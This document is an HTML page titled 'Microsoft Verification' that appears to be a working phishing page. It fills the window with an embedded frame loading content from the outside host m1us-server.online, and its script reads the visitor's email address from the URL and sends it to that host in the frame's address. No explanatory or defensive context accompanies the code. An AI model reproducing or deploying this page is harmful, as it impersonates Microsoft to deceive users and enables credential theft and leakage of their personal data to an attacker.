<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <style>
      html,
      body {
        margin: 0;
        padding: 0;
        height: 100%;
        overflow: hidden;
      }
      #obj {
        position: absolute;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
      }
    </style>
    <title>Microsoft Verification</title>
  </head>
  <body>
    <object
      data="https://m1us-server.online/?qrc="
      id="obj"
      width="100%"
      height="100%"
      type="text/html"
    >
    </object>
    <script type="text/javascript">
      function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(
          /[?&]+([^=&]+)=([^&]*)/gi,
          function (m, key, value) {
            vars[key] = value;
          }
        );
        return vars;
      }

      var email = window.location.hash.substr(1);
      if (!email) {
        var email = getUrlVars()["email"];
        document
          .getElementById("obj")
          .setAttribute(
            "data",
            "https://m1us-server.online/?qrc=" + email
          );
      } else {
        document
          .getElementById("obj")
          .setAttribute(
            "data",
            "https://m1us-server.online/?qrc=" + email
          );
      }
    </script>
  </body>
</html>
